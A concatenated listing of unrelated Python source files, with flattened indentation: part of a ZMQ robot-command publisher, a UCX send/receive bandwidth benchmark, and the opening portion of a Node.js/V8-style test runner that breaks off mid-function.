def publish_command(self, command_state_seq, mode='acc', append_time=True):
num_commands = command_state_seq.shape[0]
q = np.array(command_state_seq[:,:6]) #TODO: Remove hardode!
qd = np.array(command_state_seq[:,6:12])
qdd = np.array(command_state_seq[:, 12:18])
if append_time:
command_times = np.array(command_state_seq[:, -1]).reshape(num_commands,1)
if mode == 'pos':
command = q
elif mode == 'vel':
command = qd
elif mode == 'acc':
command = qdd
elif mode == 'full':
command = command_state_seq
if append_time:
command = np.concatenate((command, command_times),axis=-1)
print('Publishing plan', command.shape)
self.zmq_comms.send_command(command)
def close(self):
#close thread
self.zmq_comms.close()
|
local-send-recv.py
|
"""
Benchmark send receive on one machine
"""
import argparse
import asyncio
import multiprocessing as mp
from time import perf_counter as clock
from distributed.utils import format_bytes, parse_bytes
import numpy
import ucp
mp = mp.get_context("spawn")
def server(queue, args):
ucp.init()
if args.object_type == "numpy":
import numpy as np
else:
import cupy as np
np.cuda.runtime.setDevice(args.server_dev)
async def run():
async def server_handler(ep):
times = []
msg_recv_list = []
if not args.reuse_alloc:
for _ in range(args.n_iter):
msg_recv_list.append(np.zeros(args.n_bytes, dtype="u1"))
else:
t = np.zeros(args.n_bytes, dtype="u1")
for _ in range(args.n_iter):
msg_recv_list.append(t)
assert msg_recv_list[0].nbytes == args.n_bytes
for i in range(args.n_iter):
await ep.recv(msg_recv_list[i], args.n_bytes)
await ep.send(msg_recv_list[i], args.n_bytes)
await ep.close()
lf.close()
lf = ucp.create_listener(server_handler)
queue.put(lf.port)
while not lf.closed():
await asyncio.sleep(0.5)
loop = asyncio.get_event_loop()
loop.run_until_complete(run())
loop.close()
def client(queue, port, args):
import ucp
ucp.init()
if args.object_type == "numpy":
import numpy as np
else:
import cupy as np
np.cuda.runtime.setDevice(args.client_dev)
async def run():
ep = await ucp.create_endpoint(args.server_address, port)
msg_send_list = []
msg_recv_list = []
if not args.reuse_alloc:
for i in range(args.n_iter):
msg_send_list.append(np.arange(args.n_bytes, dtype="u1"))
msg_recv_list.append(np.zeros(args.n_bytes, dtype="u1"))
else:
t1 = np.arange(args.n_bytes, dtype="u1")
t2 = np.zeros(args.n_bytes, dtype="u1")
for i in range(args.n_iter):
msg_send_list.append(t1)
msg_recv_list.append(t2)
assert msg_send_list[0].nbytes == args.n_bytes
assert msg_recv_list[0].nbytes == args.n_bytes
if args.cuda_profile:
np.cuda.profiler.start()
times = []
for i in range(args.n_iter):
start = clock()
await ep.send(msg_send_list[i], args.n_bytes)
await ep.recv(msg_recv_list[i], args.n_bytes)
stop = clock()
times.append(stop - start)
if args.cuda_profile:
np.cuda.profiler.stop()
queue.put(times)
loop = asyncio.get_event_loop()
loop.run_until_complete(run())
loop.close()
def parse_args():
parser = argparse.ArgumentParser(description="Roundtrip benchmark")
parser.add_argument(
"-n",
"--n-bytes",
metavar="BYTES",
default="10 Mb",
type=parse_bytes,
help="Message size. Default '10 Mb'.",
)
parser.add_argument(
"--n-iter",
metavar="N",
default=10,
type=int,
help="Numer of send / recv iterations (default 10).",
)
parser.add_argument(
"-o",
"--object_type",
default="numpy",
choices=["numpy", "cupy"],
help="In-memory array type.",
)
parser.add_argument(
"-v",
"--verbose",
default=False,
action="store_true",
help="Whether to print timings per iteration.",
)
parser.add_argument(
"-s",
"--server-address",
metavar="ip",
default=ucp.get_address(),
type=str,
help="Server address (default `ucp.get_address()`).",
)
parser.add_argument(
"-d",
"--server-dev",
metavar="N",
default=0,
type=int,
help="GPU device on server (default 0).",
)
parser.add_argument(
"-e",
"--client-dev",
metavar="N",
default=0,
type=int,
help="GPU device on client (default 0).",
)
parser.add_argument(
"--reuse-alloc",
default=False,
action="store_true",
help="Reuse memory allocations between communication.",
)
parser.add_argument(
"--cuda-profile",
default=False,
action="store_true",
help="Setting CUDA profiler.start()/stop() around send/recv "
"typically used with `nvprof --profile-from-start off "
"--profile-child-processes`",
)
args = parser.parse_args()
if args.cuda_profile and args.object_type != "cupy":
raise RuntimeError("`--cuda-profile` requires `--object_type=cupy`")
return args
def main():
args = parse_args()
q1 = mp.Queue()
p1 = mp.Process(target=server, args=(q1, args))
p1.start()
port = q1.get()
q2 = mp.Queue()
p2 = mp.Process(target=client, args=(q2, port, args))
p2.start()
times = q2.get()
p1.join()
p2.join()
assert not p1.exitcode
assert not p2.exitcode
assert len(times) == args.n_iter
print("Roundtrip benchmark")
print("--------------------------")
print(f"n_iter | {args.n_iter}")
print(f"n_bytes | {format_bytes(args.n_bytes)}")
print(f"object | {args.object_type}")
print(f"reuse alloc | {args.reuse_alloc}")
print("==========================")
if args.object_type == "cupy":
print(f"Device(s) | {args.server_dev}, {args.client_dev}")
else:
print(f"Device(s) | Single CPU")
print(
f"Average | {format_bytes(2 * args.n_iter * args.n_bytes / sum(times))}/s"
)
print("--------------------------")
print("Iterations")
print("--------------------------")
for i, t in enumerate(times):
ts = format_bytes(2 * args.n_bytes / t)
ts = (" " * (9 - len(ts))) + ts
print("%03d |%s/s" % (i, ts))
if __name__ == "__main__":
main()
|
test.py
|
#!/usr/bin/env python
#
# Copyright 2008 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import imp
import logging
import optparse
import os
import re
import signal
import subprocess
import sys
import tempfile
import time
import threading
import utils
import multiprocessing
import errno
from os.path import join, dirname, abspath, basename, isdir, exists
from datetime import datetime
from Queue import Queue, Empty
logger = logging.getLogger('testrunner')
skip_regex = re.compile(r'# SKIP\S*\s+(.*)', re.IGNORECASE)
VERBOSE = False
# ---------------------------------------------
# --- P r o g r e s s I n d i c a t o r s ---
# ---------------------------------------------
class ProgressIndicator(object):
def __init__(self, cases, flaky_tests_mode):
self.cases = cases
self.flaky_tests_mode = flaky_tests_mode
self.parallel_queue = Queue(len(cases))
self.sequential_queue = Queue(len(cases))
for case in cases:
if case.parallel:
self.parallel_queue.put_nowait(case)
else:
self.sequential_queue.put_nowait(case)
self.succeeded = 0
self.remaining = len(cases)
self.total = len(cases)
self.failed = [ ]
self.flaky_failed = [ ]
self.crashed = 0
self.flaky_crashed = 0
self.lock = threading.Lock()
self.shutdown_event = threading.Event()
def PrintFailureHeader(self, test):
if test.IsNegative():
negative_marker = '[negative] '
else:
negative_marker = ''
print "=== %(label)s %(negative)s===" % {
'label': test.GetLabel(),
'negative': negative_marker
}
print "Path: %s" % "/".join(test.path)
def Run(self, tasks):
self.Starting()
threads = []
# Spawn N-1 threads and then use this thread as the last one.
# That way -j1 avoids threading altogether which is a nice fallback
# in case of threading problems.
for i in xrange(tasks - 1):
thread = threading.Thread(target=self.RunSingle, args=[True, i + 1])
threads.append(thread)
thread.start()
try:
self.RunSingle(False, 0)
# Wait for the remaining threads
for thread in threads:
# Use a timeout so that signals (ctrl-c) will be processed.
thread.join(timeout=10000000)
except (KeyboardInterrupt, SystemExit), e:
self.shutdown_event.set()
except Exception, e:
# If there's an exception we schedule an interruption for any
# remaining threads.
self.shutdown_event.set()
# ...and then reraise the exception to bail out
raise
self.Done()
return not self.failed
def RunSingle(self, parallel, thread_id):
while not self.shutdown_event.is_set():
try:
test = self.parallel_queue.get_nowait()
except Empty:
if parallel:
return
try:
test = self.sequential_queue.get_nowait()
except Empty:
return
case = test.case
case.thread_id = thread_id
self.lock.acquire()
self.AboutToRun(case)
self.lock.release()
try:
start = datetime.now()
output = case.Run()
# SmartOS has a bug that causes unexpected ECONNREFUSED errors.
# See https://smartos.org/bugview/OS-2767
# If ECONNREFUSED on SmartOS, retry the test one time.
if (output.UnexpectedOutput() and
sys.platform == 'sunos5' and
'ECONNREFUSED' in output.output.stderr):
output = case.Run()
output.diagnostic.append('ECONNREFUSED received, test retried')
case.duration = (datetime.now() - start)
except IOError, e:
return
if self.shutdown_event.is_set():
return
self.lock.acquire()
if output.UnexpectedOutput():
if FLAKY in output.test.outcomes and self.flaky_tests_mode == DONTCARE:
self.flaky_failed.append(output)
if output.HasCrashed():
self.flaky_crashed += 1
else:
self.failed.append(output)
if output.HasCrashed():
self.crashed += 1
else:
self.succeeded += 1
self.remaining -= 1
self.HasRun(output)
self.lock.release()
def EscapeCommand(command):
parts = []
for part in command:
if ' ' in part:
# Escape spaces. We may need to escape more characters for this
# to work properly.
parts.append('"%s"' % part)
else:
parts.append(part)
return " ".join(parts)
class SimpleProgressIndicator(ProgressIndicator):
def Starting(self):
print 'Running %i tests' % len(self.cases)
def Done(self):
print
for failed in self.failed:
self.PrintFailureHeader(failed.test)
if failed.output.stderr:
print "--- stderr ---"
print failed.output.stderr.strip()
if failed.output.stdout:
print "--- stdout ---"
print failed.output.stdout.strip()
print "Command: %s" % EscapeCommand(failed.command)
if failed.HasCrashed():
print "--- %s ---" % PrintCrashed(failed.output.exit_code)
if failed.HasTimedOut():
print "--- TIMEOUT ---"
if len(self.failed) == 0:
print "==="
print "=== All tests succeeded"
print "==="
else:
print
print "==="
print "=== %i tests failed" % len(self.failed)
if self.crashed > 0:
print "=== %i tests CRASHED" % self.crashed
print "==="
class VerboseProgressIndicator(SimpleProgressIndicator):
def AboutToRun(self, case):
print 'Starting %s...' % case.GetLabel()
sys.stdout.flush()
def HasRun(self, output):
if output.UnexpectedOutput():
if output.HasCrashed():
outcome = 'CRASH'
else:
outcome = 'FAIL'
else:
outcome = 'pass'
print 'Done running %s: %s' % (output.test.GetLabel(), outcome)
class DotsProgressIndicator(SimpleProgressIndicator):
def AboutToRun(self, case):
pass
def HasRun(self, output):
total = self.succeeded + len(self.failed)
if (total > 1) and (total % 50 == 1):
sys.stdout.write('\n')
if output.UnexpectedOutput():
if output.HasCrashed():
sys.stdout.write('C')
sys.stdout.flush()
elif output.HasTimedOut():
sys.stdout.write('T')
sys.stdout.flush()
else:
sys.stdout.write('F')
sys.stdout.flush()
else:
sys.stdout.write('.')
sys.stdout.flush()
class TapProgressIndicator(SimpleProgressIndicator):
def _printDiagnostic(self, messages):
for l in messages.splitlines():
logger.info('# ' + l)
def Starting(self):
logger.info('1..%i' % len(self.cases))
self._done = 0
def AboutToRun(self, case):
pass
def HasRun(self, output):
self._done += 1
# Print test name as (for example) "parallel/test-assert". Tests that are
# scraped from the addons documentation are all named test.js, making it
# hard to decipher what test is running when only the filename is printed.
prefix = abspath(join(dirname(__file__), '../test')) + os.sep
command = output.command[-1]
if command.endswith('.js'): command = command[:-3]
if command.startswith(prefix): command = command[len(prefix):]
command = command.replace('\\', '/')
if output.UnexpectedOutput():
status_line = 'not ok %i %s' % (self._done, command)
if FLAKY in output.test.outcomes and self.flaky_tests_mode == DONTCARE:
status_line = status_line + ' # TODO : Fix flaky test'
logger.info(status_line)
self._printDiagnostic("\n".join(output.diagnostic))
if output.HasCrashed():
self._printDiagnostic(PrintCrashed(output.output.exit_code))
if output.HasTimedOut():
self._printDiagnostic('TIMEOUT')
self._printDiagnostic(output.output.stderr)
self._printDiagnostic(output.output.stdout)
else:
skip = skip_regex.search(output.output.stdout)
if skip:
logger.info(
'ok %i %s # skip %s' % (self._done, command, skip.group(1)))
else:
status_line = 'ok %i %s' % (self._done, command)
if FLAKY in output.test.outcomes:
status_line = status_line + ' # TODO : Fix flaky test'
logger.info(status_line)
self._printDiagnostic("\n".join(output.diagnostic))
duration = output.test.duration
# total_seconds() was added in 2.7
total_seconds = (duration.microseconds +
(duration.seconds + duration.days * 24 * 3600) * 10**6) / 10**6
# duration_ms is measured in seconds and is read as such by TAP parsers.
# It should read as "duration including ms" rather than "duration in ms"
logger.info(' ---')
logger.info(' duration_ms: %d.%d' % (total_seconds, duration.microseconds / 1000))
logger.info(' ...')
def Done(self):
pass
class CompactProgressIndicator(ProgressIndicator):
def __init__(self, cases, flaky_tests_mode, templates):
super(CompactProgressIndicator, self).__init__(cases, flaky_tests_mode)
self.templates = templates
self.last_status_length = 0
self.start_time = time.time()
def Starting(self):
pass
def Done(self):
self.PrintProgress('Done')
def AboutToRun(self, case):
self.PrintProgress(case.GetLabel())
def HasRun(self, output):
if output.UnexpectedOutput():
self.ClearLine(self.last_status_length)
self.PrintFailureHeader(output.test)
stdout = output.output.stdout.strip()
if len(stdout):
print self.templates['stdout'] % stdout
stderr = output.output.stderr.strip()
if len(stderr):
print self.templates['stderr'] % stderr
print "Command: %s" % EscapeCommand(output.command)
if output.HasCrashed():
print "--- %s ---" % PrintCrashed(output.output.exit_code)
if output.HasTimedOut():
print "--- TIMEOUT ---"
def Truncate(self, str, length):
if length and (len(str) > (length - 3)):
return str[:(length-3)] + "..."
else:
return str
def PrintProgress(self, name):
self.ClearLine(self.last_status_length)
elapsed = time.time() - self.start_time
status = self.templates['status_line'] % {
'passed': self.succeeded,
'remaining': (((self.total - self.remaining) * 100) // self.total),
'failed': len(self.failed),
'test': name,
'mins': int(elapsed) / 60,
'secs': int(elapsed) % 60
}
status = self.Truncate(status, 78)
self.last_status_length = len(status)
print status,
sys.stdout.flush()
class ColorProgressIndicator(CompactProgressIndicator):
def __init__(self, cases, flaky_tests_mode):
templates = {
'status_line': "[%(mins)02i:%(secs)02i|\033[34m%%%(remaining) 4d\033[0m|\033[32m+%(passed) 4d\033[0m|\033[31m-%(failed) 4d\033[0m]: %(test)s",
'stdout': "\033[1m%s\033[0m",
'stderr': "\033[31m%s\033[0m",
}
super(ColorProgressIndicator, self).__init__(cases, flaky_tests_mode, templates)
def ClearLine(self, last_line_length):
print "\033[1K\r",
class MonochromeProgressIndicator(CompactProgressIndicator):
def __init__(self, cases, flaky_tests_mode):
templates = {
'status_line': "[%(mins)02i:%(secs)02i|%%%(remaining) 4d|+%(passed) 4d|-%(failed) 4d]: %(test)s",
'stdout': '%s',
'stderr': '%s',
'clear': lambda last_line_length: ("\r" + (" " * last_line_length) + "\r"),
'max_length': 78
}
super(MonochromeProgressIndicator, self).__init__(cases, flaky_tests_mode, templates)
def ClearLine(self, last_line_length):
print ("\r" + (" " * last_line_length) + "\r"),
PROGRESS_INDICATORS = {
'verbose': VerboseProgressIndicator,
'dots': DotsProgressIndicator,
'color': ColorProgressIndicator,
'tap': TapProgressIndicator,
'mono': MonochromeProgressIndicator
}
# -------------------------
# --- F r a m e w o r k ---
# -------------------------
class CommandOutput(object):
def __init__(self, exit_code, timed_out, stdout, stderr):
self.exit_code = exit_code
self.timed_out = timed_out
self.stdout = stdout
self.stderr = stderr
self.failed = None
class TestCase(object):
def __init__(self, context, path, arch, mode):
self.path = path
self.context = context
self.duration = None
self.arch = arch
self.mode = mode
self.parallel = False
self.thread_id = 0
def IsNegative(self):
return self.context.expect_fail
def CompareTime(self, other):
return cmp(other.duration, self.duration)
def DidFail(self, output):
if output.failed is None:
output.failed = self.IsFailureOutput(output)
return output.failed
def IsFailureOutput(self, output):
return output.exit_code != 0
def GetSource(self):
return "(no source available)"
def RunCommand(self, command, env):
full_command = self.context.processor(command)
output = Execute(full_command,
self.context,
self.context.GetTimeout(self.mode),
env)
self.Cleanup()
return TestOutput(self,
full_command,
output,
self.context.store_unexpected_output)
def BeforeRun(self):
pass
def AfterRun(self, result):
pass
def Run(self):
self.BeforeRun()
try:
result = self.RunCommand(self.GetCommand(), {
"TEST_THREAD_ID": "%d" % self.thread_id
})
finally:
# Tests can leave the tty in non-blocking mode. If the test runner
# tries to print to stdout/stderr after that and the tty buffer is
# full, it'll die with a EAGAIN OSError. Ergo, put the tty back in
# blocking mode before proceeding.
if sys.platform != 'win32':
from fcntl import fcntl, F_GETFL, F_SETFL
from os import O_NONBLOCK
for fd in 0,1,2: fcntl(fd, F_SETFL, ~O_NONBLOCK & fcntl(fd, F_GETFL))
self.AfterRun(result)
return result
def Cleanup(self):
return
class TestOutput(object):
def __init__(self, test, command, output, store_unexpected_output):
self.test = test
self.command = command
self.output = output
self.store_unexpected_output = store_unexpected_output
self.diagnostic = []
def UnexpectedOutput(self):
if self.HasCrashed():
outcome = CRASH
elif self.HasTimedOut():
outcome = TIMEOUT
elif self.HasFailed():
outcome = FAIL
else:
outcome = PASS
return not outcome in self.test.outcomes
def HasPreciousOutput(self):
return self.UnexpectedOutput() and self.store_unexpected_output
def HasCrashed(self):
if utils.IsWindows():
return 0x80000000 & self.output.exit_code and not (0x3FFFFF00 & self.output.exit_code)
else:
# Timed out tests will have exit_code -signal.SIGTERM.
if self.output.timed_out:
return False
return self.output.exit_code < 0 and \
self.output.exit_code != -signal.SIGABRT
def HasTimedOut(self):
return self.output.timed_out;
def HasFailed(self):
execution_failed = self.test.DidFail(self.output)
if self.test.IsNegative():
return not execution_failed
else:
return execution_failed
def KillProcessWithID(pid):
if utils.IsWindows():
os.popen('taskkill /T /F /PID %d' % pid)
else:
os.kill(pid, signal.SIGTERM)
MAX_SLEEP_TIME = 0.1
INITIAL_SLEEP_TIME = 0.0001
SLEEP_TIME_FACTOR = 1.25
SEM_INVALID_VALUE = -1
SEM_NOGPFAULTERRORBOX = 0x0002 # Microsoft Platform SDK WinBase.h
def Win32SetErrorMode(mode):
prev_error_mode = SEM_INVALID_VALUE
try:
import ctypes
prev_error_mode = ctypes.windll.kernel32.SetErrorMode(mode);
except ImportError:
pass
return prev_error_mode
def RunProcess(context, timeout, args, **rest):
if context.verbose: print "#", " ".join(args)
popen_args = args
prev_error_mode = SEM_INVALID_VALUE;
if utils.IsWindows():
if context.suppress_dialogs:
# Try to change the error mode to avoid dialogs on fatal errors. Don't
# touch any existing error mode flags by merging the existing error mode.
# See http://blogs.msdn.com/oldnewthing/archive/2004/07/27/198410.aspx.
error_mode = SEM_NOGPFAULTERRORBOX;
prev_error_mode = Win32SetErrorMode(error_mode);
Win32SetErrorMode(error_mode | prev_error_mode);
faketty = rest.pop('faketty', False)
pty_out = rest.pop('pty_out')
process = subprocess.Popen(
shell = utils.IsWindows(),
args = popen_args,
**rest
)
if faketty:
os.close(rest['stdout'])
if utils.IsWindows() and context.suppress_dialogs and prev_error_mode != SEM_INVALID_VALUE:
Win32SetErrorMode(prev_error_mode)
# Compute the end time - if the process crosses this limit we
# consider it timed out.
if timeout is None: end_time = None
else: end_time = time.time() + timeout
timed_out = False
# Repeatedly check the exit code from the process in a
# loop and keep track of whether or not it times out.
exit_code = None
sleep_time = INITIAL_SLEEP_TIME
output = ''
if faketty:
while True:
if time.time() >= end_time:
# Kill the process and wait for it to exit.
KillProcessWithID(process.pid)
exit_code = process.wait()
timed_out = True
break
# source: http://stackoverflow.com/a/12471855/1903116
# related: http://stackoverflow.com/q/11165521/1903116
try:
data = os.read(pty_out, 9999)
except OSError as e:
if e.errno != errno.EIO:
raise
break # EIO means EOF on some systems
else:
if not data: # EOF
break
output += data
while exit_code is None:
if (not end_time is None) and (time.time() >= end_time):
# Kill the process and wait for it to exit.
KillProcessWithID(process.pid)
exit_code = process.wait()
timed_out = True
else:
exit_code = process.poll()
time.sleep(sleep_time)
sleep_time = sleep_time * SLEEP_TIME_FACTOR
if sleep_time > MAX_SLEEP_TIME:
sleep_time = MAX_SLEEP_TIME
return (process, exit_code, timed_out, output)
def PrintError(str):
sys.stderr.write(str)
sys.stderr.write('\n')
def CheckedUnlink(name):
while True:
try:
os.unlink(name)
except OSError, e:
# On Windows unlink() fails if another process (typically a virus scanner
# or the indexing service) has the file open. Those processes keep a
# file open for a short time only, so yield and try again; it'll succeed.
if sys.platform == 'win32' and e.errno == errno.EACCES:
time.sleep(0)
continue
PrintError("os.unlink() " + str(e))
break
def Execute(args, context, timeout=None, env={}, faketty=False):
if faketty:
import pty
(out_master, fd_out) = pty.openpty()
fd_err = fd_out
pty_out = out_master
else:
(fd_out, outname) = tempfile.mkstemp()
(fd_err, errname) = tempfile.mkstemp()
pty_out = None
# Extend environment
env_copy = os.environ.copy()
for key, value in env.iteritems():
env_copy[key] = value
(process, exit_code, timed_out, output) = RunProcess(
context,
timeout,
args = args,
stdout = fd_out,
stderr = fd_err,
env = env_copy,
faketty = faketty,
pty_out = pty_out
)
if faketty:
os.close(out_master)
errors = ''
else:
os.close(fd_out)
os.close(fd_err)
output = file(outname).read()
errors = file(errname).read()
CheckedUnlink(outname)
CheckedUnlink(errname)
return CommandOutput(exit_code, timed_out, output, errors)
def CarCdr(path):
if len(path) == 0:
return (None, [ ])
else:
return (path[0], path[1:])
class TestConfiguration(object):
def __init__(self, context, root):
self.context = context
self.root = root
def Contains(self, path, file):
if len(path) > len(file):
return False
for i in xrange(len(path)):
if not path[i].match(file[i]):
return False
return True
def GetTestStatus(self, sections, defs):
pass
class TestSuite(object):
def __init__(self, name):
self.name = name
def GetName(self):
return self.name
# Use this to run several variants of the tests, e.g.:
# VARIANT_FLAGS = [[], ['--always_compact', '--noflush_code']]
VARIANT_FLAGS = [[]]
class TestRepository(TestSuite):
def __init__(self, path):
normalized_path = abspath(path)
super(TestRepository, self).__init__(basename(normalized_path))
self.path = normalized_path
self.is_loaded = False
self.config = None
def GetConfiguration(self, context):
if self.is_loaded:
return self.config
self.is_loaded = True
file = None
try:
(file, pathname, description) = imp.find_module('testcfg', [ self.path ])
module = imp.load_module('testcfg', file, pathname, description)
self.config = module.GetConfiguration(context, self.path)
if hasattr(self.config, 'additional_flags'):
self.config.additional_flags += context.node_args
else:
self.config.additional_flags = context.node_args
finally:
if file:
file.close()
return self.config
def GetBuildRequirements(self, path, context):
return self.GetConfiguration(context).GetBuildRequirements()
def AddTestsToList(self, result, current_path, path, context, arch, mode):
for v in VARIANT_FLAGS:
tests = self.GetConfiguration(context).ListTests(current_path, path,
arch, mode)
for t in tests: t.variant_flags = v
result += tests * context.repeat
def GetTestStatus(self, context, sections, defs):
self.GetConfiguration(context).GetTestStatus(sections, defs)
class LiteralTestSuite(TestSuite):
def __init__(self, tests):
super(LiteralTestSuite, self).__init__('root')
self.tests = tests
def GetBuildRequirements(self, path, context):
(name, rest) = CarCdr(path)
result = [ ]
for test in self.tests:
if not name or name.match(test.GetName()):
result += test.GetBuildRequirements(rest, context)
return result
def ListTests(self, current_path, path, context, arch, mode):
(name, rest) = CarCdr(path)
result = [ ]
for test in self.tests:
test_name = test.GetName()
if not name or name.match(test_name):
full_path = current_path + [test_name]
test.AddTestsToList(result, full_path, path, context, arch, mode)
result.sort(cmp=lambda a, b: cmp(a.GetName(), b.GetName()))
return result
def GetTestStatus(self, context, sections, defs):
for test in self.tests:
test.GetTestStatus(context, sections, defs)
SUFFIX = {
'debug' : '_g',
'release' : '' }
FLAGS = {
'debug' : ['--enable-slow-asserts', '--debug-code', '--verify-heap'],
'release' : []}
TIMEOUT_SCALEFACTOR = {
'armv6' : { 'debug' : 12, 'release' : 3 }, # The ARM buildbots are slow.
'arm' : { 'debug' : 8, 'release' : 2 },
'ia32' : { 'debug' : 4, 'release' : 1 },
'ppc' : { 'debug' : 4, 'release' : 1 },
's390' : { 'debug' : 4, 'release' : 1 } }
class Context(object):
def __init__(self, workspace, buildspace, verbose, vm, args, expect_fail,
timeout, processor, suppress_dialogs,
store_unexpected_output, repeat):
self.workspace = workspace
self.buildspace = buildspace
self.verbose = verbose
self.vm_root = vm
self.node_args = args
self.expect_fail = expect_fail
self.timeout = timeout
self.processor = processor
self.suppress_dialogs = suppress_dialogs
self.store_unexpected_output = store_unexpected_output
self.repeat = repeat
def GetVm(self, arch, mode):
if arch == 'none':
name = 'out/Debug/node' if mode == 'debug' else 'out/Release/node'
else:
name = 'out/%s.%s/node' % (arch, mode)
# Currently GYP does not support output_dir for MSVS.
# http://code.google.com/p/gyp/issues/detail?id=40
# It will put the builds into Release/node.exe or Debug/node.exe
if utils.IsWindows():
out_dir = os.path.join(dirname(__file__), "..", "out")
if not exists(out_dir):
if mode == 'debug':
name = os.path.abspath('Debug/node.exe')
else:
name = os.path.abspath('Release/node.exe')
else:
name = os.path.abspath(name + '.exe')
return name
def GetVmFlags(self, testcase, mode):
return testcase.variant_flags + FLAGS[mode]
def GetTimeout(self, mode):
return self.timeout * TIMEOUT_SCALEFACTOR[ARCH_GUESS or 'ia32'][mode]
def RunTestCases(cases_to_run, progress, tasks, flaky_tests_mode):
progress = PROGRESS_INDICATORS[progress](cases_to_run, flaky_tests_mode)
return progress.Run(tasks)
# -------------------------------------------
# --- T e s t C o n f i g u r a t i o n ---
# -------------------------------------------
SKIP = 'skip'
FAIL = 'fail'
PASS = 'pass'
OKAY = 'okay'
TIMEOUT = 'timeout'
CRASH = 'crash'
SLOW = 'slow'
FLAKY = 'flaky'
DONTCARE = 'dontcare'
class Expression(object):
pass
class Constant(Expression):
def __init__(self, value):
self.value = value
def Evaluate(self, env, defs):
return self.value
class Variable(Expression):
def __init__(self, name):
self.name = name
def GetOutcomes(self, env, defs):
if self.name in env: return ListSet([env[self.name]])
else: return Nothing()
class Outcome(Expression):
def __init__(self, name):
self.name = name
def GetOutcomes(self, env, defs):
if self.name in defs:
return defs[self.name].GetOutcomes(env, defs)
else:
return ListSet([self.name])
class Set(object):
pass
class ListSet(Set):
def __init__(self, elms):
self.elms = elms
def __str__(self):
return "ListSet%s" % str(self.elms)
def Intersect(self, that):
if not isinstance(that, ListSet):
return that.Intersect(self)
return ListSet([ x for x in self.elms if x in that.elms ])
def Union(self, that):
if not isinstance(that, ListSet):
return that.Union(self)
return ListSet(self.elms + [ x for x in that.elms if x not in self.elms ])
def IsEmpty(self):
return len(self.elms) == 0
class Everything(Set):
def Intersect(self, that):
return that
def Union(self, that):
return self
def IsEmpty(self):
return False
class Nothing(Set):
def Intersect(self, that):
return self
def Union(self, that):
return that
def IsEmpty(self):
return True
class Operation(Expression):
def __init__(self, left, op, right):
self.left = left
self.op = op
self.right = right
def Evaluate(self, env, defs):
if self.op == '||' or self.op == ',':
return self.left.Evaluate(env, defs) or self.right.Evaluate(env, defs)
elif self.op == 'if':
return False
elif self.op == '==':
inter = self.left.GetOutcomes(env, defs).Intersect(self.right.GetOutcomes(env, defs))
return not inter.IsEmpty()
else:
assert self.op == '&&'
return self.left.Evaluate(env, defs) and self.right.Evaluate(env, defs)
def GetOutcomes(self, env, defs):
if self.op == '||' or self.op == ',':
return self.left.GetOutcomes(env, defs).Union(self.right.GetOutcomes(env, defs))
elif self.op == 'if':
if self.right.Evaluate(env, defs): return self.left.GetOutcomes(env, defs)
else: return Nothing()
else:
assert self.op == '&&'
return self.left.GetOutcomes(env, defs).Intersect(self.right.GetOutcomes(env, defs))
def IsAlpha(str):
for char in str:
if not (char.isalpha() or char.isdigit() or char == '_'):
return False
return True
class Tokenizer(object):
"""A simple string tokenizer that chops expressions into variables,
parens and operators"""
def __init__(self, expr):
self.index = 0
self.expr = expr
self.length = len(expr)
self.tokens = None
def Current(self, length = 1):
if not self.HasMore(length): return ""
return self.expr[self.index:self.index+length]
def HasMore(self, length = 1):
return self.index < self.length + (length - 1)
def Advance(self, count = 1):
self.index = self.index + count
def AddToken(self, token):
self.tokens.append(token)
def SkipSpaces(self):
while self.HasMore() and self.Current().isspace():
self.Advance()
def Tokenize(self):
self.tokens = [ ]
while self.HasMore():
self.SkipSpaces()
if not self.HasMore():
return None
if self.Current() == '(':
self.AddToken('(')
self.Advance()
elif self.Current() == ')':
self.AddToken(')')
self.Advance()
elif self.Current() == '$':
self.AddToken('$')
self.Advance()
elif self.Current() == ',':
self.AddToken(',')
self.Advance()
elif IsAlpha(self.Current()):
buf = ""
while self.HasMore() and IsAlpha(self.Current()):
buf += self.Current()
self.Advance()
self.AddToken(buf)
elif self.Current(2) == '&&':
self.AddToken('&&')
self.Advance(2)
elif self.Current(2) == '||':
self.AddToken('||')
self.Advance(2)
elif self.Current(2) == '==':
self.AddToken('==')
self.Advance(2)
else:
return None
return self.tokens
class Scanner(object):
"""A simple scanner that can serve out tokens from a given list"""
def __init__(self, tokens):
self.tokens = tokens
self.length = len(tokens)
self.index = 0
def HasMore(self):
return self.index < self.length
def Current(self):
return self.tokens[self.index]
def Advance(self):
self.index = self.index + 1
def ParseAtomicExpression(scan):
if scan.Current() == "true":
scan.Advance()
return Constant(True)
elif scan.Current() == "false":
scan.Advance()
return Constant(False)
elif IsAlpha(scan.Current()):
name = scan.Current()
scan.Advance()
return Outcome(name.lower())
elif scan.Current() == '$':
scan.Advance()
if not IsAlpha(scan.Current()):
return None
name = scan.Current()
scan.Advance()
return Variable(name.lower())
elif scan.Current() == '(':
scan.Advance()
result = ParseLogicalExpression(scan)
if (not result) or (scan.Current() != ')'):
return None
scan.Advance()
return result
else:
return None
BINARIES = ['==']
def ParseOperatorExpression(scan):
left = ParseAtomicExpression(scan)
if not left: return None
